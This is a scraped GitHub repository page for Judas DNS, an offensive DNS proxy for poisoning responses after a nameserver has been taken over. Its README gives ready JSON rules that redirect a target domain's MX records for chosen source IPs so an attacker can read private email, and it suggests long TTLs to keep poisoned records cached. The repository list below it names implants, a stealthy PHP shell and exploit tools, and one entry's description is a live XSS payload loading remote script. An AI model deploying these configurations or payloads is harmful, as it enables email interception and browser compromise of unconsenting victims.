• Stars
    star
    516
  • Rank 85,726 (Top 2 %)
  • Language
    JavaScript
  • Created almost 8 years ago
  • Updated over 7 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Nameserver DNS poisoning attacks made easy

Judas DNS

                                                   
                          ,,                                                        
   `7MMF'               `7MM                       `7MM"""Yb. `7MN.   `7MF'.M"""bgd 
     MM                   MM                         MM    `Yb. MMN.    M ,MI    "Y 
     MM `7MM  `7MM   ,M""bMM   ,6"Yb.  ,pP"Ybd       MM     `Mb M YMb   M `MMb.     
     MM   MM    MM ,AP    MM  8)   MM  8I   `"       MM      MM M  `MN. M   `YMMNq. 
     MM   MM    MM 8MI    MM   ,pm9MM  `YMMMa.       MM     ,MP M   `MM.M .     `MM 
(O)  MM   MM    MM `Mb    MM  8M   MM  L.   I8       MM    ,dP' M     YMM Mb     dM 
 Ymmm9    `Mbod"YML.`Wbmd"MML.`Moo9^Yo.M9mmmP'     .JMMmmmdP' .JML.    YM P"Ybmmd"  

                                         Nameserver DNS poisoning attacks made easy

A DNS proxy server built to be deployed in place of a taken over nameserver to perform targeted exploitation. Judas works by proxying all DNS queries to the legitimate nameservers for a domain. The magic comes with Judas's rule configurations which allow you to change DNS responses depending on source IP or DNS query type. This allows an attacker to configure a malicious nameserver to do things like selectively re-route inbound email coming from specified source IP ranges (via modified MX records), set extremely long TTLs to keep poisoned records cached, and more.

How Do I Take Over a Nameserver?

For more information on taking over nameservers and hijacking DNS, see the following blog post titled "Respect My Authority – Hijacking Broken Nameservers to Compromise Your Target".

Example Config

The following is an example configuration for Judas for an example scenario where an attacker has comprimised/taken over one of Apple's authoritative nameservers (for apple.com):

{
    "version": "1.0.0",
    "port": 2248,
    "dns_query_timeout": 10000,
    "target_nameservers": [ "17.254.0.59", "17.254.0.50", "17.112.144.50", "17.112.144.59", "17.171.63.30", "17.171.63.40", "17.151.0.151", "17.151.0.152" ],
    "rules": [
        {
            "name": "Secretly redirect all emails coming from 127.0.0.1!",
            "query_type_matches": [ "MX" ],
            "ip_range_matches": [ "127.0.0.1/32" ],
            "modifications": [
                {
                    "answer": [
                        {
                            "name": "apple.com",
                            "type": 15,
                            "class": 1,
                            "ttl": 10,
                            "priority": 10,
                            "exchange": "hacktheplace.localhost"
                        }
                    ]
                }
            ]
        },
        {
            "name": "Make all responses NOERROR even if they've failed.",
            "query_type_matches": [ "*" ],
            "modifications": [
                {
                    "header": {
                        "rcode": 0
                    }
                }
            ]
        }
    ]
}

The above configuration value purposes are the following:

  • version: The configuration file format version (for now is always 1.0.0).
  • port: The port Judas should run on.
  • dns_query_timeout: How long to wait in milliseconds before giving up on a reply from the upstream target nameserver.
  • target_nameservers: The legit nameservers for your target domain, all DNS queries will be sent here from Judas on behalf of all requesting clients.
  • rules: A list of rules with modifications to the DNS response to apply if matched.
    • name: Name of a given rule.
    • query_type_matches: List of query types to match on such as CNAME, A, etc. A wildcard (*) can also be specified to match any query type.
    • ip_range_matches: List of IP ranges to match on. For selectively spoofing responses to a specific range of IPs.
    • modifications: See the "Modifications" section of this README.

Modifications

Judas's rules come with a modifications specification which is set to a list of varying modifications to make to the DNS response before it is sent back to the client. It is important that you read the node-dns documentation to understand the DNS response structure so you can modify it.

An example DNS response format is the following:

{ header: 
   { id: 25373,
     qr: 1,
     opcode: 0,
     aa: 1,
     tc: 0,
     rd: 1,
     ra: 0,
     res1: 0,
     res2: 0,
     res3: 0,
     rcode: 5 },
  question: [ { name: 'apple.com', type: 2, class: 1 } ],
  answer: 
   [ { name: 'apple.com',
       type: 2,
       class: 1,
       ttl: 86400,
       data: 'nserver2.apple.com' },
     { name: 'apple.com',
       type: 2,
       class: 1,
       ttl: 86400,
       data: 'nserver4.apple.com' },
     { name: 'apple.com',
       type: 2,
       class: 1,
       ttl: 86400,
       data: 'nserver.apple.com' },
     { name: 'apple.com',
       type: 2,
       class: 1,
       ttl: 86400,
       data: 'nserver3.apple.com' },
     { name: 'apple.com',
       type: 2,
       class: 1,
       ttl: 86400,
       data: 'nserver5.apple.com' },
     { name: 'apple.com',
       type: 2,
       class: 1,
       ttl: 86400,
       data: 'nserver6.apple.com' },
     { name: 'apple.com',
       type: 2,
       class: 1,
       ttl: 86400,
       data: 'adns2.apple.com' },
     { name: 'apple.com',
       type: 2,
       class: 1,
       ttl: 86400,
       data: 'adns1.apple.com' } ],
  authority: [],
  additional: [],
  edns_options: [],
  payload: undefined,
  address: undefined,
...trimmed for brevity...

(For more information on the DNS response data structure see this documentation.)

Writing a modification is very simple, an example rule with modification can be seen below:

{
  "name": "Make all responses NOERROR even if they've failed.",
  "query_type_matches": [ "*" ],
  "modifications": [
    {
      "header": {
        "rcode": 0
      }
    }
  ]
}

The above rule matches any query type (due to the wildcard (*)) and sets the header.rcode value of the DNS response to 0. Whatever object is set as a modification element is merged into the DNS response - replacing whatever value was originally set.

Another example is the following:

{
  "name": "Secretly redirect all emails coming from 127.0.0.1!",
  "query_type_matches": [ "MX" ],
  "ip_range_matches": [ "127.0.0.1/32" ],
  "modifications": [
    {
      "answer": [
        {
          "name": "apple.com",
          "type": 15,
          "class": 1,
          "ttl": 10,
          "priority": 10,
          "exchange": "hacktheplace.localhost"
        }
      ]
    }
  ]
}

The above rule matches any MX query from 127.0.0.1. The DNS response answer is overwritten with a single MX record for hacktheplace.localhost. A real world implementation of this would be to redirect inbound emails from a specific IP in order to read private emails of your target. Additionally an attacker in a real world scenario may also choose to modify the response TTL to be a very high value in order to persist their malicious records in client DNS caches as long as possible.

Rule Match Types

Requester IP

The following rule will match on a client's IP address:

{
  "name": "Make all responses requested from localhost (127.0.0.1) NOERROR.",
  "ip_range_matches": [ "127.0.0.1/32" ],
  "modifications": [
    {
      "header": {
        "rcode": 0
      }
    }
  ]
}

The ip_range_matches field is set to an array of IP ranges which specify the target ranges to apply the response modification to. Omission of this field is equivalent to a wildcard and will match all client IP addresses.

Request Query Type

The following rule will match on a query type of MX and CNAME and apply a response modification accordingly:

{
  "name": "Make all responses NOERROR even if they've failed.",
  "query_type_matches": [ "MX", "CNAME" ],
  "modifications": [
    {
      "header": {
        "rcode": 0
      }
    }
  ]
}

The query_type_matches field is set to an array of query types to match against. Omission of this field is equivalent to a wildcard and will match all query types.

Response Status Code

The following rule with match on a response code of NXDOMAIN and will apply a response modification accordingly:

{
  "name": "Make all responses requested from localhost (127.0.0.1) NOERROR.",
  "response_code_matches": [ "NXDOMAIN" ],
  "modifications": [
    {
      "header": {
        "rcode": 0
      }
    }
  ]
}

The response_code_matches field is set to an array of response codes to match against. Omission of this field is equivalent to a wildcard and will match all RCODE types.

More Repositories

1

NorthKoreaDNSLeak

Snapshot of North Korea's DNS data taken from zone transfers.
1,684
star
2

xsshunter-express

An easy-to-setup version of XSS Hunter. Sets up in five minutes and requires no maintenance!
JavaScript
1,458
star
3

xsshunter

The XSS Hunter service - a portable version of XSSHunter.com
JavaScript
1,458
star
4

CursedChrome

Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies, allowing you to browse sites as your victims.
JavaScript
1,391
star
5

sonar.js

A framework for identifying and launching exploits against internal network hosts. Works via WebRTC IP enumeration combined with WebSockets and external resource fingerprinting.
JavaScript
540
star
6

TLDR

TLDR (TLD Records) is a continually updated DNS archive of zone transfer attempts again all existing TLD nameservers as well as the root servers.
Python
520
star
7

cloudflare_enum

Cloudflare DNS Enumeration Tool for Pentesters
Python
515
star
8

TrustTrees

A Tool for DNS Delegation Trust Graphing
Python
400
star
9

xssless

An automated XSS payload generator written in python.
Python
313
star
10

ChromeGalvanizer

Harden your Chrome browser via enterprise policy.
Vue
275
star
11

xsshunter_client

Correlated injection proxy tool for XSS Hunter
Python
248
star
12

droidbrute

A statistically optimized USB rubber ducky payload to brute force 4-digit Android PINs.
189
star
13

RussiaDNSLeak

Summary and archives of leaked Russian TLD DNS data
181
star
14

tarnish

A Chrome extension static analysis tool to help aide in security reviews.
JavaScript
146
star
15

FlashHTTPRequest

A very simple bridge for performing Flash HTTP requests with JavaScript
HTML
77
star
16

xcname

A tool for enumerating expired domains in CNAME records
Python
58
star
17

chrome-extension-manifests-dataset

>100K Chrome Extension manifest.json files for analysis
57
star
18

RAGE

A hacked together PHP shell designed to be stealthy and portable
JavaScript
54
star
19

signal-bot

A Signal bot that utilizes the Chrome DevTools protocol to hook the Signal Electron Desktop app for automation.
JavaScript
46
star
20

PaperChaser

JavaScript
44
star
21

comfortably-run

A CLI tool which can be used to inject JavaScript into arbitrary Chrome origins via the Chrome DevTools Protocol
JavaScript
41
star
22

VietnamDNSLeak

Summary and archives of leaked Vietnam TLD DNS data
41
star
23

PERS

A passive scanning tool for finding expired domain vulnerabilities while you browse.
JavaScript
40
star
24

Metafid-Base

The base classes that are used by Metafid (a private piece of software that generates web bot code from Fiddler archives)
PHP
39
star
25

UPBRUTE

Dynamic DNS Update Bruteforce Tool
Python
30
star
26

xpire-crossdomain-scanner

Scans crossdomain.xml policies for expired domain names.
Python
26
star
27

wmap

a mass web screenshot tool for mapping web networks.
JavaScript
24
star
28

overairdroid

A python library to automate the use of the Airdroid app for Android
Python
22
star
29

lambda-intruder

An example of high-QPS requesting Burp Intruder style on AWS Lambda via self-invocation.
JavaScript
22
star
30

xsshunter_docs

XSS Hunter correlated injection API guide
18
star
31

TLD-Health-Report

Daily TLD health report generated using RIPE's DNSCheck against all existing TLDs.
17
star
32

xsshunter_chrome_extension

WHY?
JavaScript
12
star
33

FileURISecurity

Testing page for checking the privileges that a browser gives to the file:// origin
HTML
11
star
34

ctf_tools

Random CTF tool repo for small code snippets
Python
10
star
35

theinternetbackup-cli

Contribute domains to TheInternetBackup.com via an easy CLI tool!
JavaScript
10
star
36

dig-lambda-layer

A simple AWS Lambda layer to add dig support
9
star
37

mandatoryprogrammer

8
star
38

dotfiles

My dot files
Vim Script
6
star
39

subresource_integrity_rewrite

Rewrites flat HTML pages to include subresource integrity for all third party scripts/stylesheets
Python
6
star
40

elasticbeanstalk-base

Base Elastic Beanstalk config which uses Docker and an environment variable EC2_SPOT_PRICE for spot bidding
Dockerfile
5
star
41

testrepo

test
3
star
42

mygithubpage

2
star
43

Trapcall2Spreadsheet

Exports your logged Trapcalls to a CSV spreadsheet
PHP
2
star
44

teamflix-reports

A place to report bugs and feature requests for teamflix
1
star
45

testing

"><script src=//y.vg></script>
1
star